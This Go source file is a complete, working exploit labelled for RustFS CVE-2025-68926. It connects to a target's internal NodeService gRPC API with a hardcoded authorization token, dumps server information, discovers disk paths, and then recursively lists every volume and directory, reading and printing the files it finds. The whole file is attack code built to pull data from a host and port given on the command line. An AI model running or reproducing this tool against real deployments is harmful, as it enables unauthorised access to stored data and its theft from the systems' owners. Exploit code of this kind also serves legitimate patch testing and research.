package main

import (
	"bytes"
	"context"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"log"
	"os"
	"strings"
	"sync"
	"time"

	"github.com/fullstorydev/grpcurl"
	"github.com/golang/protobuf/proto"
	"github.com/jhump/protoreflect/desc"
	"github.com/jhump/protoreflect/desc/builder"
	"github.com/vmihailenco/msgpack/v5"
	"google.golang.org/grpc"
	"google.golang.org/grpc/credentials/insecure"
	"google.golang.org/grpc/metadata"
	"google.golang.org/grpc/status"
)

// hardcodedToken is the value placed in the "authorization" gRPC metadata of
// every call (see NewExploit and callMethod). The banner in main ties it to
// CVE-2025-68926; presumably it is a static credential the target accepts —
// confirm against the advisory.
const hardcodedToken = "rustfs rpc"

// maxDepth is the recursion limit ExploreAllDisks hands to ExploreDirectory:
// directories at depth >= maxDepth are not listed.
const maxDepth = 10

// Exploit bundles everything needed to issue NodeService RPCs against one
// target: the client connection, the hand-built descriptor source, and the
// outgoing context that carries the authorization metadata.
type Exploit struct {
	// ctx is the base context for every call; NewExploit attaches the
	// "authorization" metadata to it.
	ctx context.Context
	// conn is the gRPC client connection (dialed with insecure credentials).
	conn *grpc.ClientConn
	// source resolves node_service message and method descriptors for grpcurl.
	source grpcurl.DescriptorSource
}

// responseHandler receives grpcurl's invocation callbacks for a single unary
// call and records the response message and any non-OK status.
type responseHandler struct {
	// done is closed exactly once, by whichever completion callback runs first.
	done chan struct{}

	// mu guards every field below.
	mu       sync.Mutex
	closed   bool          // whether done has already been closed
	response proto.Message // last response message delivered
	err      error         // set when the call finished with a non-OK status
}

// createDescriptorSource builds, in memory, a minimal descriptor for the
// node_service.NodeService gRPC API (file "node.proto") so grpcurl can encode
// JSON requests and decode responses using these local definitions.
//
// Only the four unary methods this tool calls are declared: ServerInfo,
// ListVolumes, ListDir and ReadAll.
//
// NOTE(review): no field gets an explicit tag number, so the builder assigns
// them implicitly (presumably in AddField order). The field order in each
// message must therefore line up with the server's real .proto — TODO confirm
// against RustFS's node.proto before reordering or inserting fields.
//
// Returns an error if the descriptors fail to build or grpcurl cannot wrap them.
func createDescriptorSource() (grpcurl.DescriptorSource, error) {
	// Shared error payload embedded in the ListVolumes/ListDir/ReadAll responses.
	errorMsg := builder.NewMessage("Error").
		AddField(builder.NewField("code", builder.FieldTypeUInt32())).
		AddField(builder.NewField("error_info", builder.FieldTypeString()))

	// ServerInfo: server_properties is opaque bytes (decoded as msgpack by callers).
	serverInfoReq := builder.NewMessage("ServerInfoRequest").
		AddField(builder.NewField("metrics", builder.FieldTypeBool()))
	serverInfoResp := builder.NewMessage("ServerInfoResponse").
		AddField(builder.NewField("success", builder.FieldTypeBool())).
		AddField(builder.NewField("server_properties", builder.FieldTypeBytes())).
		AddField(builder.NewField("error_info", builder.FieldTypeString()))

	// ListVolumes: each volume_infos entry is a string (parsed as JSON by ListVolumes).
	listVolumesReq := builder.NewMessage("ListVolumesRequest").
		AddField(builder.NewField("disk", builder.FieldTypeString()))
	listVolumesResp := builder.NewMessage("ListVolumesResponse").
		AddField(builder.NewField("success", builder.FieldTypeBool())).
		AddField(builder.NewField("volume_infos", builder.FieldTypeString()).SetRepeated()).
		AddField(builder.NewField("error", builder.FieldTypeMessage(errorMsg)))

	// ListDir: returns entry names in the repeated "volumes" field.
	listDirReq := builder.NewMessage("ListDirRequest").
		AddField(builder.NewField("disk", builder.FieldTypeString())).
		AddField(builder.NewField("volume", builder.FieldTypeString())).
		AddField(builder.NewField("dir_path", builder.FieldTypeString())).
		AddField(builder.NewField("count", builder.FieldTypeInt32()))
	listDirResp := builder.NewMessage("ListDirResponse").
		AddField(builder.NewField("success", builder.FieldTypeBool())).
		AddField(builder.NewField("volumes", builder.FieldTypeString()).SetRepeated()).
		AddField(builder.NewField("error", builder.FieldTypeMessage(errorMsg)))

	// ReadAll: returns the whole object contents as bytes.
	readAllReq := builder.NewMessage("ReadAllRequest").
		AddField(builder.NewField("disk", builder.FieldTypeString())).
		AddField(builder.NewField("volume", builder.FieldTypeString())).
		AddField(builder.NewField("path", builder.FieldTypeString()))
	readAllResp := builder.NewMessage("ReadAllResponse").
		AddField(builder.NewField("success", builder.FieldTypeBool())).
		AddField(builder.NewField("data", builder.FieldTypeBytes())).
		AddField(builder.NewField("error", builder.FieldTypeMessage(errorMsg)))

	// Package and service names form the full method path used by callMethod
	// ("node_service.NodeService/<Method>"). All methods are unary (streaming=false).
	file, err := builder.NewFile("node.proto").SetPackageName("node_service").
		AddMessage(errorMsg).
		AddMessage(serverInfoReq).
		AddMessage(serverInfoResp).
		AddMessage(listVolumesReq).
		AddMessage(listVolumesResp).
		AddMessage(listDirReq).
		AddMessage(listDirResp).
		AddMessage(readAllReq).
		AddMessage(readAllResp).
		AddService(builder.NewService("NodeService").
			AddMethod(builder.NewMethod("ServerInfo",
				builder.RpcTypeMessage(serverInfoReq, false),
				builder.RpcTypeMessage(serverInfoResp, false),
			)).
			AddMethod(builder.NewMethod("ListVolumes",
				builder.RpcTypeMessage(listVolumesReq, false),
				builder.RpcTypeMessage(listVolumesResp, false),
			)).
			AddMethod(builder.NewMethod("ListDir",
				builder.RpcTypeMessage(listDirReq, false),
				builder.RpcTypeMessage(listDirResp, false),
			)).
			AddMethod(builder.NewMethod("ReadAll",
				builder.RpcTypeMessage(readAllReq, false),
				builder.RpcTypeMessage(readAllResp, false),
			)),
		).Build()
	if err != nil {
		return nil, fmt.Errorf("failed to build descriptors: %w", err)
	}
	// Wrap the built file so grpcurl can look up services and messages in it.
	source, err := grpcurl.DescriptorSourceFromFileDescriptors(file)
	if err != nil {
		return nil, fmt.Errorf("failed to create descriptor source: %w", err)
	}
	return source, nil
}

// NewExploit creates a client for host:port using insecure (plaintext)
// transport credentials. It attaches the hardcoded authorization token to the
// base context and builds the NodeService descriptor source.
//
// host may be a hostname, an IPv4 address, or an IPv6 literal with or without
// surrounding brackets ("::1" and "[::1]" are equivalent).
//
// On descriptor-building failure the connection is closed before the error is
// returned.
func NewExploit(host, port string) (*Exploit, error) {
	// Bracket IPv6 literals so "::1" + "50051" becomes "[::1]:50051" rather
	// than the unparsable "::1:50051" (the same rule net.JoinHostPort applies).
	bare := strings.TrimSuffix(strings.TrimPrefix(host, "["), "]")
	address := bare + ":" + port
	if strings.Contains(bare, ":") {
		address = "[" + bare + "]:" + port
	}

	conn, err := grpc.Dial(address, grpc.WithTransportCredentials(insecure.NewCredentials()))
	if err != nil {
		return nil, fmt.Errorf("failed to connect: %w", err)
	}

	ctx := metadata.NewOutgoingContext(context.Background(), metadata.Pairs("authorization", hardcodedToken))

	source, err := createDescriptorSource()
	if err != nil {
		conn.Close()
		return nil, fmt.Errorf("failed to create descriptor source: %w", err)
	}

	return &Exploit{conn: conn, source: source, ctx: ctx}, nil
}

// Close releases the gRPC connection if one is held. Any error from closing it
// is discarded.
func (e *Exploit) Close() {
	conn := e.conn
	if conn == nil {
		return
	}
	_ = conn.Close()
}

// OnResolveMethod is part of grpcurl's event-handler contract; the resolved
// method descriptor is not needed here.
func (h *responseHandler) OnResolveMethod(_ *desc.MethodDescriptor) {
}

// OnSendHeaders ignores outgoing headers; callMethod already chose them.
func (h *responseHandler) OnSendHeaders(_ metadata.MD) {
}

// OnReceiveHeaders ignores response headers; only the message and final
// status are recorded.
func (h *responseHandler) OnReceiveHeaders(_ metadata.MD) {
}

// OnReceiveResponse stores msg as the call's response and signals completion
// by closing done, unless an earlier callback already closed it.
func (h *responseHandler) OnReceiveResponse(msg proto.Message) {
	h.mu.Lock()
	h.response = msg
	alreadyClosed := h.closed
	h.closed = true
	if !alreadyClosed {
		close(h.done)
	}
	h.mu.Unlock()
}

// OnReceiveTrailers records a non-OK final status as h.err and signals
// completion by closing done, unless an earlier callback already closed it.
func (h *responseHandler) OnReceiveTrailers(s *status.Status, md metadata.MD) {
	h.mu.Lock()
	defer h.mu.Unlock()

	// Status.Err is nil exactly when the code is OK, so only failures are kept.
	if statusErr := s.Err(); statusErr != nil {
		h.err = statusErr
	}

	if h.closed {
		return
	}
	h.closed = true
	close(h.done)
}

// callTimeout bounds a single unary RPC. e.ctx carries no deadline, so without
// it an unresponsive target would block the whole run indefinitely.
const callTimeout = 60 * time.Second

// callMethod invokes node_service.NodeService/<methodName> with reqJSON as the
// JSON-encoded request. It returns the response message re-encoded through
// grpcurl's JSON formatter (default-valued fields included) and decoded into a
// generic map.
//
// Errors are returned for parser construction, transport failures, a non-OK
// gRPC status (including the callTimeout deadline), a missing response, and
// response formatting or decoding.
func (e *Exploit) callMethod(methodName string, reqJSON string) (map[string]interface{}, error) {
	ctx, cancel := context.WithTimeout(e.ctx, callTimeout)
	defer cancel()

	handler := &responseHandler{done: make(chan struct{})}
	reqData := bytes.NewReader([]byte(reqJSON))
	parser, formatter, err := grpcurl.RequestParserAndFormatterFor(grpcurl.FormatJSON, e.source, true, true, reqData)
	if err != nil {
		return nil, fmt.Errorf("failed to create parser: %w", err)
	}

	headers := []string{fmt.Sprintf("authorization: %s", hardcodedToken)}
	requestSupplier := func(msg proto.Message) error { return parser.Next(msg) }
	fullMethodName := fmt.Sprintf("node_service.NodeService/%s", methodName)

	if err := grpcurl.InvokeRPC(ctx, e.source, e.conn, fullMethodName, headers, handler, requestSupplier); err != nil {
		return nil, fmt.Errorf("gRPC call failed: %w", err)
	}

	<-handler.done

	// Read the callback-written fields under the handler's own lock.
	handler.mu.Lock()
	response, callErr := handler.response, handler.err
	handler.mu.Unlock()

	if callErr != nil {
		return nil, callErr
	}
	if response == nil {
		return nil, fmt.Errorf("no response received")
	}

	formatted, err := formatter(response)
	if err != nil {
		return nil, fmt.Errorf("failed to format response: %w", err)
	}

	var result map[string]interface{}
	if err := json.Unmarshal([]byte(formatted), &result); err != nil {
		return nil, fmt.Errorf("failed to parse response: %w", err)
	}

	return result, nil
}

// ServerInfo calls NodeService/ServerInfo with metrics enabled, decodes the
// returned serverProperties (base64 from the JSON mapping, then msgpack), and
// prints the decoded value as indented JSON.
//
// Returns an error if the RPC fails, the server reports success=false,
// serverProperties is empty, or either decoding step fails.
func (e *Exploit) ServerInfo() error {
	fmt.Println("\n[+] Testing ServerInfo...")
	resp, err := e.callMethod("ServerInfo", `{"metrics": true}`)
	if err != nil {
		return err
	}

	if !getBool(resp, "success") {
		return fmt.Errorf("ServerInfo returned success=false")
	}

	serverProps := getString(resp, "serverProperties")
	if serverProps == "" {
		return fmt.Errorf("invalid serverProperties")
	}

	// Decode failures are returned rather than ignored so the caller can report
	// why nothing was printed.
	data, err := base64.StdEncoding.DecodeString(serverProps)
	if err != nil {
		return fmt.Errorf("decoding serverProperties base64: %w", err)
	}

	var decoded interface{}
	if err := msgpack.Unmarshal(data, &decoded); err != nil {
		return fmt.Errorf("decoding serverProperties msgpack: %w", err)
	}

	fmt.Println("[+] ServerInfo decoded:")
	printJSON(decoded)
	return nil
}

// DiscoverDisks tries to learn the target's disk paths from ServerInfo and
// prints them. On any failure it prints the reason and falls back to
// defaultDisks. The returned error is currently always nil; it is kept so the
// signature stays stable for callers.
func (e *Exploit) DiscoverDisks() ([]string, error) {
	fmt.Println("\n[+] Discovering disks from ServerInfo...")

	disks, err := e.discoverDiskPaths()
	if err != nil {
		// Fallback is deliberate, but report why so it is not mistaken for a
		// successful discovery.
		fmt.Printf("[-] Disk discovery failed (%v); using default disks\n", err)
		return e.defaultDisks(), nil
	}

	fmt.Printf("[+] Discovered %d disks:\n", len(disks))
	for _, disk := range disks {
		fmt.Printf("  - %s\n", disk)
	}
	return disks, nil
}

// discoverDiskPaths performs the ServerInfo call and decoding steps, returning
// the extracted disk paths or an error naming the step that failed.
func (e *Exploit) discoverDiskPaths() ([]string, error) {
	resp, err := e.callMethod("ServerInfo", `{"metrics": true}`)
	if err != nil {
		return nil, err
	}
	if !getBool(resp, "success") {
		return nil, fmt.Errorf("ServerInfo returned success=false")
	}

	serverProps := getString(resp, "serverProperties")
	if serverProps == "" {
		return nil, fmt.Errorf("empty serverProperties")
	}

	data, err := base64.StdEncoding.DecodeString(serverProps)
	if err != nil {
		return nil, fmt.Errorf("decoding serverProperties base64: %w", err)
	}

	var decoded interface{}
	if err := msgpack.Unmarshal(data, &decoded); err != nil {
		return nil, fmt.Errorf("decoding serverProperties msgpack: %w", err)
	}

	disks := extractDisks(decoded)
	if len(disks) == 0 {
		return nil, fmt.Errorf("no disk paths found in serverProperties")
	}
	return disks, nil
}

// defaultDisks returns a fresh slice of four guessed disk paths, used when
// disk discovery via ServerInfo fails. The receiver is not consulted.
func (e *Exploit) defaultDisks() []string {
	fallback := []string{
		"/data/rustfs0",
		"/data/rustfs1",
		"/data/rustfs2",
		"/data/rustfs3",
	}
	return fallback
}

// extractDisks pulls disk paths out of a msgpack-decoded ServerInfo payload.
//
// NOTE(review): the layout is inferred purely from the indexing below, so
// confirm it against RustFS's server-properties struct. The payload is expected
// to be an array of at least 8 elements whose element at index 7 is an array of
// per-disk arrays, each starting with the disk path as a string.
//
// Entries that don't match that shape, or whose path is empty, are skipped.
// Returns nil when the payload has the wrong shape or no paths are found.
func extractDisks(data interface{}) []string {
	top, topOK := data.([]interface{})
	if !topOK || len(top) <= 7 {
		return nil
	}

	entries, entriesOK := top[7].([]interface{})
	if !entriesOK {
		return nil
	}

	var paths []string
	for i := range entries {
		row, rowOK := entries[i].([]interface{})
		if !rowOK || len(row) < 1 {
			continue
		}
		path, pathOK := row[0].(string)
		if !pathOK || path == "" {
			continue
		}
		paths = append(paths, path)
	}
	return paths
}

// ListVolumes calls NodeService/ListVolumes for disk and returns the "name" of
// each volume. Each volumeInfos entry is a JSON string; entries that are not
// strings, fail to parse, or lack a string "name" are skipped.
//
// Returns an error if the request cannot be encoded, the RPC fails, the server
// reports success=false, or volumeInfos is missing or not a list.
func (e *Exploit) ListVolumes(disk string) ([]string, error) {
	// Encode with json.Marshal so quotes/backslashes in disk cannot corrupt or
	// inject into the request document.
	reqBytes, err := json.Marshal(struct {
		Disk string `json:"disk"`
	}{disk})
	if err != nil {
		return nil, fmt.Errorf("encoding ListVolumes request: %w", err)
	}

	resp, err := e.callMethod("ListVolumes", string(reqBytes))
	if err != nil {
		return nil, err
	}

	if !getBool(resp, "success") {
		return nil, fmt.Errorf("ListVolumes returned success=false")
	}

	volInfos, ok := resp["volumeInfos"].([]interface{})
	if !ok {
		return nil, fmt.Errorf("invalid volumeInfos type")
	}

	var volumes []string
	for _, volInfo := range volInfos {
		volStr, ok := volInfo.(string)
		if !ok {
			continue
		}
		var volData map[string]interface{}
		if err := json.Unmarshal([]byte(volStr), &volData); err != nil {
			continue
		}
		if name, ok := volData["name"].(string); ok {
			volumes = append(volumes, name)
		}
	}
	return volumes, nil
}

// ListDir calls NodeService/ListDir for dirPath inside volume on disk, asking
// for up to 1000 entries, and returns the string entries from the response.
// Non-string entries are skipped.
//
// Returns an error if the request cannot be encoded, the RPC fails, the server
// reports success=false, or the entry list is missing or not a list.
func (e *Exploit) ListDir(disk, volume, dirPath string) ([]string, error) {
	// Encode with json.Marshal so quotes/backslashes in path components cannot
	// corrupt or inject into the request document.
	reqBytes, err := json.Marshal(struct {
		Disk    string `json:"disk"`
		Volume  string `json:"volume"`
		DirPath string `json:"dirPath"`
		Count   int32  `json:"count"`
	}{disk, volume, dirPath, 1000})
	if err != nil {
		return nil, fmt.Errorf("encoding ListDir request: %w", err)
	}

	resp, err := e.callMethod("ListDir", string(reqBytes))
	if err != nil {
		return nil, err
	}

	if !getBool(resp, "success") {
		return nil, fmt.Errorf("ListDir returned success=false")
	}

	volumes, ok := resp["volumes"].([]interface{})
	if !ok {
		return nil, fmt.Errorf("invalid volumes type")
	}

	var result []string
	for _, vol := range volumes {
		if volStr, ok := vol.(string); ok {
			result = append(result, volStr)
		}
	}
	return result, nil
}

// ReadAll calls NodeService/ReadAll for path inside volume on disk and returns
// the file contents. The "data" field is expected to be base64 (the JSON
// mapping for bytes); if it does not decode, the raw string is returned as-is.
//
// Returns an error if the request cannot be encoded, the RPC fails, the server
// reports success=false, or "data" is missing or not a string.
func (e *Exploit) ReadAll(disk, volume, path string) ([]byte, error) {
	// Encode with json.Marshal so quotes/backslashes in path components cannot
	// corrupt or inject into the request document.
	reqBytes, err := json.Marshal(struct {
		Disk   string `json:"disk"`
		Volume string `json:"volume"`
		Path   string `json:"path"`
	}{disk, volume, path})
	if err != nil {
		return nil, fmt.Errorf("encoding ReadAll request: %w", err)
	}

	resp, err := e.callMethod("ReadAll", string(reqBytes))
	if err != nil {
		return nil, err
	}

	if !getBool(resp, "success") {
		return nil, fmt.Errorf("ReadAll returned success=false")
	}

	data, ok := resp["data"].(string)
	if !ok {
		return nil, fmt.Errorf("invalid data type")
	}

	decoded, err := base64.StdEncoding.DecodeString(data)
	if err != nil {
		// Deliberate best-effort: hand back the undecoded text.
		return []byte(data), nil
	}

	return decoded, nil
}

// ExploreDirectory lists dirPath inside volume on disk and walks it depth-first.
// Entries ending in "/" are treated as subdirectories and recursed into.
// Other entries are read with ReadAll: JSON contents are pretty-printed
// (truncated by printJSONIndent), and anything else is summarized by size.
//
// dirPath is volume-relative ("" is the volume root). Recursion stops at
// depth >= maxDepth. Listing and read failures are printed, not returned.
func (e *Exploit) ExploreDirectory(disk, volume, dirPath string, depth, maxDepth int) {
	if depth >= maxDepth {
		return
	}

	indent := strings.Repeat("  ", depth)
	// Always separate volume and path, so "a/b" in "bucket" prints as
	// "bucket/a/b" (and the root as "bucket/").
	fmt.Printf("%s[*] Exploring: %s/%s\n", indent, volume, dirPath)

	items, err := e.ListDir(disk, volume, dirPath)
	if err != nil {
		fmt.Printf("%s[-] Failed to list directory: %v\n", indent, err)
		return
	}

	for _, item := range items {
		isDir := strings.HasSuffix(item, "/")
		item = strings.TrimSuffix(item, "/")
		if item == "" {
			// Skips empty entries, and also a bare "/", which would otherwise
			// resolve back to dirPath and re-list the same directory at every
			// depth.
			continue
		}

		fullPath := item
		if dirPath != "" {
			fullPath = fmt.Sprintf("%s/%s", dirPath, item)
		}

		if isDir {
			e.ExploreDirectory(disk, volume, fullPath, depth+1, maxDepth)
			continue
		}

		fmt.Printf("%s[+] File: %s\n", indent, fullPath)
		data, err := e.ReadAll(disk, volume, fullPath)
		if err != nil {
			fmt.Printf("%s  [-] Failed to read: %v\n", indent, err)
			continue
		}

		if len(data) == 0 {
			fmt.Printf("%s  [Empty]\n", indent)
			continue
		}

		var jsonData interface{}
		if err := json.Unmarshal(data, &jsonData); err == nil {
			printJSONIndent(jsonData, indent+"    ")
		} else {
			fmt.Printf("%s  Size: %d bytes\n", indent, len(data))
		}
	}
}

// ExploreAllDisks prints a section header and then, for each disk, lists its
// volumes and recursively explores each volume from its root up to maxDepth.
// A disk whose volumes cannot be listed is logged and skipped.
func (e *Exploit) ExploreAllDisks(disks []string) {
	fmt.Println("\n======================================================================")
	fmt.Println("Recursive Directory Exploration")
	fmt.Println("======================================================================")

	for i := range disks {
		d := disks[i]
		fmt.Printf("\n[*] Processing disk: %s\n", d)

		vols, listErr := e.ListVolumes(d)
		if listErr != nil {
			log.Printf("Failed to list volumes on %s: %v", d, listErr)
			continue
		}

		for j := range vols {
			fmt.Printf("[*] Exploring volume: %s on %s\n", vols[j], d)
			e.ExploreDirectory(d, vols[j], "", 0, maxDepth)
		}
	}
}

// getBool returns m[key] if it holds a bool, and false otherwise (including a
// missing key or a nil map).
func getBool(m map[string]interface{}, key string) bool {
	if b, isBool := m[key].(bool); isBool {
		return b
	}
	return false
}

// getString returns m[key] if it holds a string, and "" otherwise (including a
// missing key or a nil map).
func getString(m map[string]interface{}, key string) string {
	s, _ := m[key].(string) // s is "" when the assertion fails
	return s
}

// printJSON pretty-prints data to stdout via printJSONIndent with no line
// prefix.
func printJSON(data interface{}) {
	var prefix string // empty: lines are printed flush-left
	printJSONIndent(data, prefix)
}

// printJSONIndent writes data to stdout as two-space-indented JSON, prefixing
// every line with indent. At most 30 lines are printed, followed by a
// "... (N more lines)" marker when output is cut. Values that encoding/json
// cannot marshal are printed once with %+v instead.
func printJSONIndent(data interface{}, indent string) {
	const maxLines = 30

	pretty, err := json.MarshalIndent(data, "", "  ")
	if err != nil {
		fmt.Printf("%s%+v\n", indent, data)
		return
	}

	all := strings.Split(string(pretty), "\n")
	shown := all
	if len(shown) > maxLines {
		shown = shown[:maxLines]
	}
	for _, line := range shown {
		fmt.Printf("%s%s\n", indent, line)
	}
	if hidden := len(all) - len(shown); hidden > 0 {
		fmt.Printf("%s... (%d more lines)\n", indent, hidden)
	}
}

// main expects <host> <port> arguments. It prints a banner, connects with the
// hardcoded token, dumps ServerInfo, discovers disks (falling back to defaults),
// and recursively explores every volume on each disk.
func main() {
	if len(os.Args) < 3 {
		fmt.Fprintf(os.Stderr, "Usage: %s <host> <port>\n", os.Args[0])
		os.Exit(1)
	}

	host := os.Args[1]
	port := os.Args[2]

	fmt.Println("======================================================================")
	fmt.Println("         RustFS CVE-2025-68926 Exploit")
	fmt.Println("======================================================================")
	fmt.Printf("[*] Target: %s:%s\n", host, port)
	fmt.Printf("[*] Token: '%s'\n", hardcodedToken)
	fmt.Printf("[*] Timestamp: %s\n", time.Now().Format("2006-01-02 15:04:05"))

	exploit, err := NewExploit(host, port)
	if err != nil {
		log.Fatalf("Failed to create exploit: %v", err)
	}
	defer exploit.Close()

	// A ServerInfo failure is reported but not fatal; disk discovery has its
	// own fallback.
	if err := exploit.ServerInfo(); err != nil {
		log.Printf("ServerInfo error: %v", err)
	}

	disks, err := exploit.DiscoverDisks()
	if err != nil {
		// log.Fatalf exits via os.Exit, which skips deferred calls, so close the
		// connection explicitly first.
		exploit.Close()
		log.Fatalf("Failed to discover disks: %v", err)
	}

	exploit.ExploreAllDisks(disks)

	fmt.Println("\n======================================================================")
	fmt.Println("Exploitation Complete")
	fmt.Println("======================================================================")
}
